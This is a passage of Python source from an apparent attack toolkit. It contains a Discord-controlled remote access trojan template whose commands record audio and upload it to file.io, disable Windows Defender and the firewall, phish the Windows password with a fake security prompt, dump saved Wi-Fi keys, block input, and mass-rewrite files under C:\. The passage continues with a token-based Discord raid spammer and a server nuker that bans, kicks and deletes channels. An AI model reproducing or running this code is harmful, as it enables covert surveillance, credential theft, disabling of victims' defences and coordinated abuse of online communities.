from scipy.io.wavfile import write
seconds = float(message.content[10:])
temp = (os.getenv('TEMP'))
fs = 44100
laco = temp + r"\output.wav"
myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)
sd.wait()
write(laco, fs, myrecording)
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.wav"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.wav /f")
else:
file = discord.File(check, filename="output.wav")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.wav /f")
if message.content.startswith("!delete"):
global statue
import time
import subprocess
import os
instruction = message.content[8:]
instruction = "del " + '"' + instruction + '"' + " /F"
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
global statue
statue = "ok"
if statue:
numb = len(result)
if numb > 0:
await message.channel.send("[*] an error has occurred")
else:
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
statue = None
if message.content == "!disableantivirus":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import subprocess
instruction = \""" REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" | findstr /I /C:"CurrentBuildnumber" \"""
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
done = result.split()
boom = done[2:]
if boom <= ['17763']:
os.system(r"Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet")
await message.channel.send("[*] Command successfuly executed")
elif boom >= ['18362']:
os.system(r\"""powershell Add-MpPreference -ExclusionPath "C:\\\\" \""")
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] An unknown error has occurred")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!disablefirewall":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
os.system(r"NetSh Advfirewall set allprofiles state off")
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content.startswith("!audio"):
import os
temp = (os.getenv("TEMP"))
temp = temp + r"\audiofile.wav"
if os.path.isfile(temp):
delelelee = "del " + temp + r" /f"
os.system(delelelee)
temp1 = (os.getenv("TEMP"))
temp1 = temp1 + r"\sounds.vbs"
if os.path.isfile(temp1):
delelee = "del " + temp1 + r" /f"
os.system(delelee)
await message.attachments[0].save(temp)
temp2 = (os.getenv("TEMP"))
f5 = open(temp2 + r"\sounds.vbs", 'a')
result = \""" Dim oPlayer: Set oPlayer = CreateObject("WMPlayer.OCX"): oPlayer.URL = \""" + '"' + temp + '"' \""": oPlayer.controls.play: While oPlayer.playState <> 1 WScript.Sleep 100: Wend: oPlayer.close \"""
f5.write(result)
f5.close()
os.system(r"start %temp%\sounds.vbs")
await message.channel.send("[*] Command successfuly executed")
#if adding startup n stuff this needs to be edited to that
if message.content == "!selfdestruct": #prob beter way to do dis
import inspect
import os
import sys
import inspect
uncritproc()
cmd2 = inspect.getframeinfo(inspect.currentframe()).filename
hello = os.getpid()
bat = \"""@echo off\""" + " & " + "taskkill" + r" /F /PID " + str(hello) + " &" + " del " + '"' + cmd2 + '"' + r" /F" + " & " + r\"""start /b "" cmd /c del "%~f0"& taskkill /IM cmd.exe /F &exit /b\"""
temp = (os.getenv("TEMP"))
temp5 = temp + r"\delete.bat"
if os.path.isfile(temp5):
delelee = "del " + temp5 + r" /f"
os.system(delelee)
f5 = open(temp + r"\delete.bat", 'a')
f5.write(bat)
f5.close()
os.system(r"start /min %temp%\delete.bat")
if message.content == "!windowspass":
import sys
import subprocess
import os
cmd82 = "$cred=$host.ui.promptforcredential('Windows Security Update','',[Environment]::UserName,[Environment]::UserDomainName);"
cmd92 = 'echo $cred.getnetworkcredential().password;'
full_cmd = 'Powershell "{} {}"'.format(cmd82,cmd92)
instruction = full_cmd
def shell():
output = subprocess.run(full_cmd, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("password user typed in is: " + result)
if message.content == "!displayoff":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
WM_SYSCOMMAND = 274
HWND_BROADCAST = 65535
SC_MONITORPOWER = 61808
ctypes.windll.user32.BlockInput(True)
ctypes.windll.user32.SendMessageW(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, 2)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!displayon":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
from pynput.keyboard import Key, Controller
keyboard = Controller()
keyboard.press(Key.esc)
keyboard.release(Key.esc)
keyboard.press(Key.esc)
keyboard.release(Key.esc)
ctypes.windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!hide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system(\"""attrib +h "{}" \""".format(cmd237))
await message.channel.send("[*] Command successfuly executed")
if message.content == "!unhide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system(\"""attrib -h "{}" \""".format(cmd237))
await message.channel.send("[*] Command successfuly executed")
#broken. might fix if someone want me too.
if message.content == "!decode" or message.content == "!encode":
import os
import base64
def encode(file):
f = open(file)
data = f.read()
f.close()
data = data.encode("utf-8")
encodedBytes = base64.b64encode(data)
os.remove(file)
file = file + '.rip'
t = open(file, "w+")
encodedBytes = encodedBytes.decode("utf-8")
t.write(encodedBytes)
t.close()
def decode(file):
f = open(file)
data = f.read()
f.close()
data = data.encode("utf-8")
decodedBytes = base64.b64decode(data)
os.remove(file)
file = file.replace('.rip', '')
t = open(file, "w+")
decodedBytes = decodedBytes.decode("utf-8")
t.write(decodedBytes)
t.close()
parentDirectory = 'C:\\\\'
for root, dirs, files in os.walk(parentDirectory):
for afile in files:
full_path = os.path.join(root, afile)
if message.content == "!encode":
encode(full_path)
await message.channel.send("[*] Command successfuly executed")
if message.content == ('!decode') and full_path.endswith('.rip'):
decode(full_path)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!ejectcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door open', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!retractcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door closed', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!critproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
critproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content == "!uncritproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
uncritproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content.startswith("!website"):
import subprocess
website = message.content[9:]
def OpenBrowser(URL):
if not URL.startswith('http'):
URL = 'http://' + URL
subprocess.call('start ' + URL, shell=True)
OpenBrowser(website)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!distaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statuuusss
import time
statuuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statuuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
import winreg as reg
reg.CreateKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
else:
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!enbtaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statusuusss
import time
statusuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statusuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
await message.channel.send("[*] Command successfuly executed")
else:
import winreg as reg
reg.DeleteKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!getwifipass":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import os
import subprocess
import json
x = subprocess.run("NETSH WLAN SHOW PROFILE", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
x = x[x.find("User profiles\\r\\n-------------\\r\\n")+len("User profiles\\r\\n-------------\\r\\n"):len(x)].replace('\\r\\n\\r\\n"',"").replace('All User Profile', r'"All User Profile"')[4:]
lst = []
done = []
for i in x.splitlines():
i = i.replace('"All User Profile" : ',"")
b = -1
while True:
b = b + 1
if i.startswith(" "):
i = i[1:]
if b >= len(i):
break
lst.append(i)
lst.remove('')
for e in lst:
output = subprocess.run('NETSH WLAN SHOW PROFILE "' + e + '" KEY=CLEAR ', stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
for i in output.splitlines():
if i.find("Key Content") != -1:
ok = i[4:].replace("Key Content : ","")
break
almoast = '"' + e + '"' + ":" + '"' + ok + '"'
done.append(almoast)
await message.channel.send("[*] Command successfuly executed")
await message.channel.send(done)
else:
await message.channel.send("[*] This command requires admin privileges")
client.run(token)""".replace("~~TOKENHERE~~", tokenbot))
except Exception as e:
print(f"""\t[!] Error writing file: {e}""")
main()
print(f"""\t[!] File has been correctly written to "temp/{fileName}.py" \n""")
main()
discordrat()
elif choice == "raid":
ur = 'https://discord.com/api/v9/channels/messages'
if not os.path.exists('tokens.txt'):
fichier = open("tokens.txt", "a")
fichier.close
verif = input("""\t[#] Write your tokens in the file "tokens.txt" then ENTER to launch the raid""")
tokens = open('tokens.txt', 'r').read().splitlines()
print()
def randstr(lenn):
alpha = "abcdefghijklmnopqrstuvwxyz0123456789"
text = ''
for i in range(0, lenn):
text += alpha[random.randint(0, len(alpha) - 1)]
return text
def spammer():
tokens = open('tokens.txt', 'r').read().splitlines()
choiceraid = input(f""" {username}\\servraider> """)
if choiceraid == 'spam':
tokens = open("tokens.txt", "r").read().splitlines()
channel = input(f'\t[+] Channel ID: ')
mess = input(f'\t[+] Message: ')
delay = float(input(f'\t[+] Delay: '))
ch = input('\t[+] Do you want append random string (Yes | No)? ').lower()
def spam(token, mess):
if ch == 'yes':
mess += " | " + "".join(random.choices(string.ascii_lowercase + string.digits, k=5))
else:
pass
url = 'https://discord.com/api/v9/channels/' + channel + '/messages'
payload = {"content": mess, "tts": False}
header = {"authorization": token,
"accept": "*/*",
"accept-language": "en-GB",
"content-length": "90",
"content-type": "application/json",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.9003 Chrome/91.0.4472.164 Electron/13.4.0 Safari/537.36",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjI0NjMiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6InNrIiwiY2xpZW50X2J1aWxkX251bWJlciI6OTkwMTYsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
}
while True:
time.sleep(delay)
src = requests.post(url, headers=header, json=payload)
if src.status_code == 429:
ratelimit = json.loads(src.content)
print(f"\t\t[!] Ratelimit for", str(float(ratelimit['retry_after'])) + " seconds")
time.sleep(float(ratelimit['retry_after']))
elif src.status_code == 200:
print(f'\t\t[!] {mess} sent')
elif src.status_code == 401:
print(f'\t\t[!] Invalid token')
elif src.status_code == 404:
print(f'\t\t[!] Not found')
elif src.status_code == 403:
print(f'\t\t[!] Token havent got access to this channel')
def thread():
text = mess
for token in tokens:
threading.Thread(target=spam, args=(token, text)).start()
start = input(f'\t[#] Press any key to start')
start = thread()
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'dmspam':
def DMSpammer(idd, message, token):
header = {
'Authorization': token,
"accept": "*/*",
"accept-language": "en-GB",
"content-length": "90",
"content-type": "application/json",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.9003 Chrome/91.0.4472.164 Electron/13.4.0 Safari/537.36",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjI0NjMiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6InNrIiwiY2xpZW50X2J1aWxkX251bWJlciI6OTkwMTYsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
}
payload = {'recipient_id': idd}
r1 = requests.post(f'https://discordapp.com/api/v9/users/@me/channels', headers=header,
json=payload)
if chrr == 'yes':
message += " | " + "".join(random.choices(string.ascii_lowercase + string.digits, k=5))
elif chrr == 'no':
pass
else:
pass
payload = {"content": message, "tts": False}
j = json.loads(r1.content)
while True:
r2 = requests.post(f"https://discordapp.com/api/v9/channels/{j['id']}/messages",
headers=header, json=payload)
if r2.status_code == 429:
ratelimit = json.loads(r2.content)
print(f"\t\t[!] Ratelimit for", str(float(ratelimit['retry_after'])) + " seconds")
time.sleep(float(ratelimit['retry_after']))
elif r2.status_code == 200:
print(f"[+] DM sent to {idd}!")
tokens = open("tokens.txt", "r").read().splitlines()
user = input(f"\t[+] User ID: ")
message = input(f"\t[+] Message: ")
chrr = input('\t[+] Do you want append random string (Yes | No)? ').lower()
def thread():
for token in tokens:
threading.Thread(target=DMSpammer, args=(user, message, token)).start()
start = input(f'\t[#] Press enter to start')
start = thread()
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'fspam':
def friender(token, user):
try:
user = user.split("#")
headers = {
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-GB",
"authorization": token,
"content-length": "90",
"content-type": "application/json",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.9003 Chrome/91.0.4472.164 Electron/13.4.0 Safari/537.36",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjI0NjMiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6InNrIiwiY2xpZW50X2J1aWxkX251bWJlciI6OTkwMTYsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
}
payload = {"username": user[0], "discriminator": user[1]}
src = requests.post('https://discord.com/api/v9/users/@me/relationships', headers=headers,
json=payload)
if src.status_code == 204:
print(f"\t\t[!] Friend request sent to {user[0]}#{user[1]}!")
except Exception as e:
print(e)
user = input(f"\t[+] Put Username#Tag: ")
tokens = open("tokens.txt", "r").read().splitlines()
delay = float(input(f'\t[+] Delay: '))
for token in tokens:
time.sleep(delay)
threading.Thread(target=friender, args=(token, user)).start()
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'rspam':
def reaction(chd, iddd, start, org, token):
headers = {'Content-Type': 'application/json',
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US',
'Cookie': f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
'DNT': '1',
'origin': 'https://discord.com',
'TE': 'Trailers',
'X-Super-Properties': 'eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAxIiwib3NfdmVyc2lvbiI6IjEwLjAuMTkwNDIiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6ODMwNDAsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9',
'authorization': token,
'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'
}
emoji = ej.emojize(org, use_aliases=True)
if start == '':
a = requests.put(
f"https://discordapp.com/api/v9/channels/{chd}/messages/{iddd}/reactions/{emoji}/@me",
headers=headers)
if a.status_code == 204:
print(f"\t\t[!] Reaction {org} added! ")
else:
print(f"\t\t[!] Error")
else:
print(f'\t\t[!] ERROR, press only ENTER')
tokens = open('tokens.txt', 'r').read().splitlines()
chd = input('\t[+] Channel ID: ')
iddd = input('\t[+] Message ID: ')
emoji = input('\t[+] Emoji: ')
start = input("\t[#] Press ENTER to start")
for token in tokens:
threading.Thread(target=reaction, args=(chd, iddd, start, emoji, token)).start()
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'tspam':
message = input("\t[+] Message: ")
amount = int(input("\t[+] Amount of messages: "))
delay = float(input('\t[+] Delay: '))
print(f"\t[+] 10 seconds to typing spam")
for seconds in range(10, 0, -1):
print(seconds)
time.sleep(1)
print(f'\t[#] Spamming...')
for i in range(0, amount):
if message != "":
pyautogui.typewrite(message)
pyautogui.press("enter")
else:
pyautogui.hotkey("ctrl", "v")
pyautogui.press("enter")
print(f'\t\t[!] {message} sent')
time.sleep(delay)
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'join':
http.client._is_legal_header_name = re.compile(rb'[^\s][^:\r\n]*').fullmatch
tokens = open("tokens.txt", "r").read().splitlines()
def join(invite, token):
token = token.replace("\r", "")
token = token.replace("\n", "")
headers = {
":authority": "discord.com",
":method": "POST",
":path": "/api/v9/invites/" + invite,
":scheme": "https",
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US",
"Authorization": token,
"content-length": "0",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.600 Chrome/91.0.4472.106 Electron/13.1.4 Safari/537.36",
"x-context-properties": "eyJsb2NhdGlvbiI6Ikludml0ZSBCdXR0b24gRW1iZWQiLCJsb2NhdGlvbl9ndWlsZF9pZCI6Ijg3OTc4MjM4MDAxMTk0NjAyNCIsImxvY2F0aW9uX2NoYW5uZWxfaWQiOiI4ODExMDg4MDc5NjE0MTk3OTYiLCJsb2NhdGlvbl9jaGFubmVsX3R5cGUiOjAsImxvY2F0aW9uX21lc3NhZ2VfaWQiOiI4ODExOTkzOTI5MTExNTkzNTcifQ==",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJjYW5hcnkiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC42MDAiLCJvc192ZXJzaW9uIjoiMTAuMC4yMjAwMCIsIm9zX2FyY2giOiJ4NjQiLCJzeXN0ZW1fbG9jYWxlIjoic2siLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo5NTM1MywiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
}
rrr = requests.post("https://discordapp.com/api/v9/invites/" + invite, headers=headers)
if rrr.status_code == 204 or 200:
print(f'\t\t[!] Done')
else:
print('\t\t[!] Error')
invite = input(f"\t[+] Discord server invite: ")
invite = invite.replace("https://discord.gg/", "")
invite = invite.replace("discord.gg/", "")
invite = invite.replace("https://discord.com/invite/", "")
delay = float(input(f'\t[+] Delay: '))
for token in tokens:
time.sleep(delay)
threading.Thread(target=join, args=(invite, token)).start()
time.sleep(3)
b = input('\t[+] Do you want to bypass member screening (Yes | No)? ')
if b == 'yes':
headers = {
":authority": "discord.com",
":method": "POST",
":path": "/api/v9/invites/" + invite,
":scheme": "https",
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US",
"Authorization": token,
"content-length": "0",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.600 Chrome/91.0.4472.106 Electron/13.1.4 Safari/537.36",
"x-context-properties": "eyJsb2NhdGlvbiI6Ikludml0ZSBCdXR0b24gRW1iZWQiLCJsb2NhdGlvbl9ndWlsZF9pZCI6Ijg3OTc4MjM4MDAxMTk0NjAyNCIsImxvY2F0aW9uX2NoYW5uZWxfaWQiOiI4ODExMDg4MDc5NjE0MTk3OTYiLCJsb2NhdGlvbl9jaGFubmVsX3R5cGUiOjAsImxvY2F0aW9uX21lc3NhZ2VfaWQiOiI4ODExOTkzOTI5MTExNTkzNTcifQ==",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJjYW5hcnkiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC42MDAiLCJvc192ZXJzaW9uIjoiMTAuMC4yMjAwMCIsIm9zX2FyY2giOiJ4NjQiLCJzeXN0ZW1fbG9jYWxlIjoic2siLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo5NTM1MywiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
}
def bps(invite_code, guild_id):
vur = f"https://discord.com/api/v9/guilds/{guild_id}/member-verification?with_guild=false&invite_code=" + invite_code
rr = requests.get(vur, headers=headers).json()
data = {}
data['version'] = rr['version']
data['form_fields'] = rr['form_fields']
data['form_fields'][0]['response'] = True
fv = f"https://discord.com/api/v9/guilds/{str(guild_id)}/requests/@me"
requests.put(fv, headers=headers, json=data)
sID = input('\t[+]Server ID: ')
tokens = open('tokens.txt', 'r').read().splitlines()
for token in tokens:
threading.Thread(target=bps, args=(invite, sID)).start()
elif b == 'no':
pass
print(f'\t[#] Successfully join guild\n')
spammer()
elif choiceraid == 'leave':
token = open("tokens.txt", "r").read().splitlines()
ID = input(f'\t[+] Guild ID: ')
apilink = "https://discordapp.com/api/v9/users/@me/guilds/" + str(ID)
with open('tokens.txt', 'r') as handle:
tokens = handle.readlines()
for i in tokens:
token = i.rstrip()
headers = {
'Authorization': token,
"content-length": "0",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.600 Chrome/91.0.4472.106 Electron/13.1.4 Safari/537.36",
"x-context-properties": "eyJsb2NhdGlvbiI6Ikludml0ZSBCdXR0b24gRW1iZWQiLCJsb2NhdGlvbl9ndWlsZF9pZCI6Ijg3OTc4MjM4MDAxMTk0NjAyNCIsImxvY2F0aW9uX2NoYW5uZWxfaWQiOiI4ODExMDg4MDc5NjE0MTk3OTYiLCJsb2NhdGlvbl9jaGFubmVsX3R5cGUiOjAsImxvY2F0aW9uX21lc3NhZ2VfaWQiOiI4ODExOTkzOTI5MTExNTkzNTcifQ==",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJjYW5hcnkiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC42MDAiLCJvc192ZXJzaW9uIjoiMTAuMC4yMjAwMCIsIm9zX2FyY2giOiJ4NjQiLCJzeXN0ZW1fbG9jYWxlIjoic2siLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo5NTM1MywiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
}
requests.delete(apilink, headers=headers)
print(f'\t[#] Successfully left guild\n')
spammer()
elif choiceraid == 'exit':
print()
main()
elif choiceraid == 'help':
print(f"""\n\tTool Command\tDescription\n\t------------\t-----------\n\tspam\t\tSpammer\n\tdmspam\t\tDM Spammer\n\tfspam\t\tFriends Spammer\n\trspam\t\tReactions Spammer\n\ttspam\t\tTypings Spammer\n\tjoin\t\tJoiner\n\tleave\t\tLeaver\n""")
spammer()
elif choiceraid == 'reset':
reset()
spammer()
else:
print(f"""\tInvalid command\n""")
spammer()
spammer()
elif choice == "servnuker":
token = input(f"""\t[+] Enter the token of the bot you will use to execute the RAID commands: """)
print()
def check_token():
if requests.get("https://discord.com/api/v8/users/@me", headers={"Authorization": f'{token}'}).status_code == 200:
return "user"
else:
return "bot"
import discord
token_type = check_token()
intents = discord.Intents.all()
intents.members = True
if token_type == "user":
headers = {'Authorization': f'{token}'}
client = commands.Bot(command_prefix=">", case_insensitive=False, self_bot=True, intents=intents)
elif token_type == "bot":
headers = {'Authorization': f'Bot {token}'}
client = commands.Bot(command_prefix=">", case_insensitive=False, intents=intents)
client.remove_command("help")
if not os.path.exists('Scraped'):
os.makedirs('Scraped')
fichier = open("Scraped/members.txt", "a")
fichier.close
fichier = open("Scraped/channels.txt", "a")
fichier.close
fichier = open("Scraped/roles.txt", "a")
fichier.close
class Nuker:
def BanMembers(self, guild, member):
while True:
r = requests.put(f"https://discord.com/api/v8/guilds/{guild}/bans/{member}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Banned {member.strip()}\n")
break
else:
break
def KickMembers(self, guild, member):
while True:
r = requests.delete(f"https://discord.com/api/v8/guilds/{guild}/members/{member}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Kicked {member.strip()}\n")
break
else:
break
def DeleteChannels(self, guild, channel):
while True:
r = requests.delete(f"https://discord.com/api/v8/channels/{channel}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Deleted Channel {channel.strip()}\n")
break
else:
break
def DeleteRoles(self, guild, role):
while True:
